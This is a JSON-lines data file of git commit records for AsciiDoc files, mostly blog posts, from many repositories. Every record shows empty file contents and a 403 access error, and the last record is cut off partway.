{"commit":"814ee51a45953aadfd851dda1ab8fe32a9ac6a7c","subject":"Update 2016-02-14-Over-rendering-with-staggered-alpha-values.adoc","message":"Update 2016-02-14-Over-rendering-with-staggered-alpha-values.adoc","repos":"marksubbarao\/hubpress.io,marksubbarao\/hubpress.io,marksubbarao\/hubpress.io,marksubbarao\/hubpress.io","old_file":"_posts\/2016-02-14-Over-rendering-with-staggered-alpha-values.adoc","new_file":"_posts\/2016-02-14-Over-rendering-with-staggered-alpha-values.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marksubbarao\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03f69c52154e40b3cf8b80d9fad30202d991a10d","subject":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","message":"Update 2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"443faa2fb0b6870b423a18b4a417b5db54d3e9c1","subject":"Added correct docs name for docs file in Camel-plc4x","message":"Added correct docs name for docs file in Camel-plc4x\n\nSigned-off-by: Andrea Cosentino <cdba4b3ecd9bd0b77c9c6c6fb10023f62236650e@gmail.com>\n","repos":"christophd\/camel,tadayosi\/camel,tadayosi\/camel,christophd\/camel,christophd\/camel,apache\/camel,apache\/camel,christophd\/camel,tadayosi\/camel,tadayosi\/camel,tadayosi\/camel,apache\/camel,apache\/camel,apache\/camel,apache\/camel,christophd\/camel,christophd\/camel,tadayosi\/camel","old_file":"components\/camel-plc4x\/src\/main\/docs\/plc4x-component.adoc","new_file":"components\/camel-plc4x\/src\/main\/docs\/plc4x-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c0fc270bcfd1d8f85de67dd380d813a8a6fb75c2","subject":"Update 2015-03-20-Le-commencement.adoc","message":"Update 2015-03-20-Le-commencement.adoc","repos":"Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io,Fendi-project\/fendi-project.github.io","old_file":"_posts\/2015-03-20-Le-commencement.adoc","new_file":"_posts\/2015-03-20-Le-commencement.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Fendi-project\/fendi-project.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70ca078aa954ff65394de000c3a8c2c523efe55d","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee8dfac5e354edd3cd071be01981429623a8df6a","subject":"Update 2016-12-01-Mediashare-Chat.adoc","message":"Update 2016-12-01-Mediashare-Chat.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-01-Mediashare-Chat.adoc","new_file":"_posts\/2016-12-01-Mediashare-Chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54114df2c48d1d49dd9271e0519d57991ed97cb8","subject":"Update 2016-10-02-about-crotel-studio.adoc","message":"Update 2016-10-02-about-crotel-studio.adoc","repos":"crotel\/studio,crotel\/studio,crotel\/studio,crotel\/studio","old_file":"_posts\/2016-10-02-about-crotel-studio.adoc","new_file":"_posts\/2016-10-02-about-crotel-studio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/studio.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3faff3d49324dfbb1cc8ec5168fa6275638e7aef","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af70b809037f2a7db7099b31320c1d6efaa13275","subject":"Update 2015-02-24-change-1.adoc","message":"Update 2015-02-24-change-1.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-change-1.adoc","new_file":"_posts\/2015-02-24-change-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03de352baeb979e031b8c3117d8f50438005baf0","subject":"Update 2016-11-05-Saturday.adoc","message":"Update 2016-11-05-Saturday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Saturday.adoc","new_file":"_posts\/2016-11-05-Saturday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01cb35b730047c31d49bc57e84084ac444635bb7","subject":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","message":"Update 2017-07-03-The-user-friendly-computer-programs.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_file":"_posts\/2017-07-03-The-user-friendly-computer-programs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0f3910131ee277c6b255cc7025f7a882e53aa09","subject":"Update 2017-09-20-Domain-Name-Terms-as-coding-analogy.adoc","message":"Update 2017-09-20-Domain-Name-Terms-as-coding-analogy.adoc","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-20-Domain-Name-Terms-as-coding-analogy.adoc","new_file":"_posts\/2017-09-20-Domain-Name-Terms-as-coding-analogy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d9f3d62fb3ca5c731d12a49ada97c4269dc6493","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c16690407aa5b06d8c135d2f4750dccfa764ba1e","subject":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","message":"Update 2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_file":"_posts\/2016-11-07-Healthcare-has-a-No-Problem-Problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c91900cca51a01defd790c230e631738732d16ac","subject":"Update 2016-07-23-Lemplacement-des-villages-Wisigoths-du-Razes-et-lanalyse-cartographique.adoc","message":"Update 2016-07-23-Lemplacement-des-villages-Wisigoths-du-Razes-et-lanalyse-cartographique.adoc","repos":"nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty","old_file":"_posts\/2016-07-23-Lemplacement-des-villages-Wisigoths-du-Razes-et-lanalyse-cartographique.adoc","new_file":"_posts\/2016-07-23-Lemplacement-des-villages-Wisigoths-du-Razes-et-lanalyse-cartographique.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaschaillot\/pechdencouty.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"287c4cf6f319348a83a476984adf6c4568bfcad4","subject":"add test doc for docid","message":"add test doc for docid\n","repos":"rillbert\/giblish,rillbert\/giblish,rillbert\/giblish","old_file":"data\/testdocs\/wellformed\/docidtest\/docid_1.adoc","new_file":"data\/testdocs\/wellformed\/docidtest\/docid_1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rillbert\/giblish.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8186ce7490bf2169bb9df9fbab78efd4a51c9bb7","subject":"Fmt code","message":"Fmt code\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8002f2680fbaa30402c3005b27007a897522609","subject":"Deleted _posts\/2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","message":"Deleted _posts\/2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","new_file":"_posts\/2015-01-31-Blog-Title-TG-has-a-small-DICK.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fb6bffb362128df6240b783bcffe05d980fced6","subject":"Update 2016-02-09-Esfera-en-OpenGl-ES-20-Android.adoc","message":"Update 2016-02-09-Esfera-en-OpenGl-ES-20-Android.adoc","repos":"acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io","old_file":"_posts\/2016-02-09-Esfera-en-OpenGl-ES-20-Android.adoc","new_file":"_posts\/2016-02-09-Esfera-en-OpenGl-ES-20-Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acien101\/acien101.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58e7285117d028d24add57681d11403be072d2a5","subject":"Update 2018-07-23-Running-Tasks-Based-on-Public-Holidays.adoc","message":"Update 2018-07-23-Running-Tasks-Based-on-Public-Holidays.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2018-07-23-Running-Tasks-Based-on-Public-Holidays.adoc","new_file":"_posts\/2018-07-23-Running-Tasks-Based-on-Public-Holidays.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"603811cb05d50ac2aec5c8e4f879d841d396f6ed","subject":"Update 2017-02-23-Second-Podcast-Episode.adoc","message":"Update 2017-02-23-Second-Podcast-Episode.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-02-23-Second-Podcast-Episode.adoc","new_file":"_posts\/2017-02-23-Second-Podcast-Episode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2252e2b54e27d39f58d661dba1f420691664aa38","subject":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","message":"Update 2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_file":"_posts\/2014-11-24-3d-Prirazlomnaya-Making-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a529f0710988d962d17e8afde6c919a16869e256","subject":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","message":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","repos":"silesnet\/silesnet.github.io,silesnet\/silesnet.github.io,silesnet\/silesnet.github.io","old_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silesnet\/silesnet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb3e9d0d3d8025c6f3e21f1ac021e073435350fd","subject":"Adding release notes for release of revapi_build coverage revapi revapi_maven_utils revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml revapi_maven_plugin revapi_site","message":"Adding release notes for release of revapi_build coverage revapi revapi_maven_utils revapi_basic_features revapi_jackson revapi_java_spi revapi_reporter_file_base revapi_ant_task revapi_java revapi_json revapi_reporter_json revapi_reporter_text revapi_standalone revapi_yaml revapi_maven_plugin revapi_site\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20211011-releases.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20211011-releases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"94b5fb3b71d1b7e9764fcfe29b30ae22d03f8e43","subject":"Update 2017-03-12-VIELVERSPRECHENDE-UNERWARTBARKEIT.adoc","message":"Update 2017-03-12-VIELVERSPRECHENDE-UNERWARTBARKEIT.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-03-12-VIELVERSPRECHENDE-UNERWARTBARKEIT.adoc","new_file":"_posts\/2017-03-12-VIELVERSPRECHENDE-UNERWARTBARKEIT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97c1a2a61b97cd791796eb88c6cbc53c144d72ee","subject":"add iot tenant cleanup design doc (#3149)","message":"add iot tenant cleanup design doc (#3149)\n\nSigned-off-by: Jean-Baptiste Trystram <2a64d2384370d3a99f70d1bb9b527fa9908532fd@redhat.com>","repos":"EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse","old_file":"documentation\/design\/proposals\/iot-tenant-data-cleaner.adoc","new_file":"documentation\/design\/proposals\/iot-tenant-data-cleaner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6554dc8e9a959664dafb00a29e75f23b1cdc8ad7","subject":"Update 2017-03-13-Handley-Lodge-Captures-the-Travel-Gavel.adoc","message":"Update 2017-03-13-Handley-Lodge-Captures-the-Travel-Gavel.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-03-13-Handley-Lodge-Captures-the-Travel-Gavel.adoc","new_file":"_posts\/2017-03-13-Handley-Lodge-Captures-the-Travel-Gavel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"395336b5e9dc6e356f4ef78811c975d33aebb8a6","subject":"add all-in-one docs","message":"add all-in-one docs\n","repos":"the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,the1forte\/crunchy-containers","old_file":"docs\/all-in-one\/all-in-one.asciidoc","new_file":"docs\/all-in-one\/all-in-one.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/the1forte\/crunchy-containers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef5bbaa77a6132906ffff9d769564eb04c7b5f8b","subject":"Update 2015-02-12-Eigene-Fehlerseiten-unter-Joomla-or-Error-404.adoc","message":"Update 2015-02-12-Eigene-Fehlerseiten-unter-Joomla-or-Error-404.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-12-Eigene-Fehlerseiten-unter-Joomla-or-Error-404.adoc","new_file":"_posts\/2015-02-12-Eigene-Fehlerseiten-unter-Joomla-or-Error-404.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c97c68c2d7ce66d42fb60a5626e749dc7864d6a","subject":"Update 2017-01-19-Bimeyko.adoc","message":"Update 2017-01-19-Bimeyko.adoc","repos":"alick01\/alick01.github.io,alick01\/alick01.github.io,alick01\/alick01.github.io,alick01\/alick01.github.io","old_file":"_posts\/2017-01-19-Bimeyko.adoc","new_file":"_posts\/2017-01-19-Bimeyko.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alick01\/alick01.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d6c21c862c29fe32bb81b8bd5042e6b9467cb03","subject":"Update 2019-02-02-Your-Blog-title.adoc","message":"Update 2019-02-02-Your-Blog-title.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2019-02-02-Your-Blog-title.adoc","new_file":"_posts\/2019-02-02-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29eddce4b78429724406c76727a83764bef925d4","subject":"y2b create post Samsung Gear S3 Hands On + Liquid Test","message":"y2b create post Samsung Gear S3 Hands On + Liquid Test","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-31-Samsung-Gear-S3-Hands-On--Liquid-Test.adoc","new_file":"_posts\/2016-08-31-Samsung-Gear-S3-Hands-On--Liquid-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bfe612c46ededb7f57f3a507e630aaf4d3083510","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"414b307ab329fb675eac2f17acd7d3c262e1abda","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2018\/dutchclojureday.adoc","new_file":"content\/events\/2018\/dutchclojureday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"82c3d90010b1d9f534a5167602810ee63fc7c5f2","subject":"y2b create post iPhone 7 Ready Headphones!","message":"y2b create post iPhone 7 Ready Headphones!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-05-iPhone-7-Ready-Headphones.adoc","new_file":"_posts\/2016-06-05-iPhone-7-Ready-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c18db9b062571c9846e36e081566cc366b9f1a10","subject":"Update 2016-07-22-La-transmission-du-secret.adoc","message":"Update 2016-07-22-La-transmission-du-secret.adoc","repos":"nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty,nicolaschaillot\/pechdencouty","old_file":"_posts\/2016-07-22-La-transmission-du-secret.adoc","new_file":"_posts\/2016-07-22-La-transmission-du-secret.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nicolaschaillot\/pechdencouty.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6e498494f4f420d8940f79c50e784aa37d3d891","subject":"Add `deps` and `recompact` tools to manual","message":"Add `deps` and `recompact` tools to manual\n\nThe `deps` tool in particular is very useful to know about.","repos":"sgraham\/ninja,ninja-build\/ninja,nicolasdespres\/ninja,bradking\/ninja,Qix-\/ninja,iwadon\/ninja,martine\/ninja,maruel\/ninja,atetubou\/ninja,ndsol\/subninja,ninja-build\/ninja,juntalis\/ninja,lizh06\/ninja,iwadon\/ninja,maruel\/ninja,mydongistiny\/ninja,juntalis\/ninja,sgraham\/ninja,nicolasdespres\/ninja,ndsol\/subninja,nico\/ninja,nico\/ninja,nico\/ninja,lizh06\/ninja,Qix-\/ninja,atetubou\/ninja,mydongistiny\/ninja,iwadon\/ninja,juntalis\/ninja,AoD314\/ninja,AoD314\/ninja,martine\/ninja,maruel\/ninja,fuchsia-mirror\/third_party-ninja,moroten\/ninja,ninja-build\/ninja,bradking\/ninja,fuchsia-mirror\/third_party-ninja,bradking\/ninja,moroten\/ninja,martine\/ninja,lizh06\/ninja,ndsol\/subninja,ndsol\/subninja,Qix-\/ninja,juntalis\/ninja,mydongistiny\/ninja,nico\/ninja,mydongistiny\/ninja,sgraham\/ninja,ninja-build\/ninja,nicolasdespres\/ninja,sgraham\/ninja,moroten\/ninja,iwadon\/ninja,lizh06\/ninja,fuchsia-mirror\/third_party-ninja,martine\/ninja,nicolasdespres\/ninja,atetubou\/ninja,AoD314\/ninja,fuchsia-mirror\/third_party-ninja,maruel\/ninja,Qix-\/ninja,AoD314\/ninja,atetubou\/ninja,moroten\/ninja,bradking\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lizh06\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"254da7b88253c97b25bb6ee0e2d03021a078eb5b","subject":"Create running-agent.adoc","message":"Create running-agent.adoc","repos":"jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/12\/running-agent.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/12\/running-agent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f6de27d9440ef4a4454d0533b6d53b878122ac26","subject":"Update 2016-10-02-IT-Week-4.adoc","message":"Update 2016-10-02-IT-Week-4.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-02-IT-Week-4.adoc","new_file":"_posts\/2016-10-02-IT-Week-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01f003111e2e532b1e5129d4874b6b8b0535ae23","subject":"Update 2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","message":"Update 2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","new_file":"_posts\/2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fde8d72dfb491ac13dfd07ef1557d2fe20d81054","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc669cd68396ba056609c6f28f0e503c6936ecbb","subject":"Update 2015-05-30-Hello-World-my-tech-introduction.adoc","message":"Update 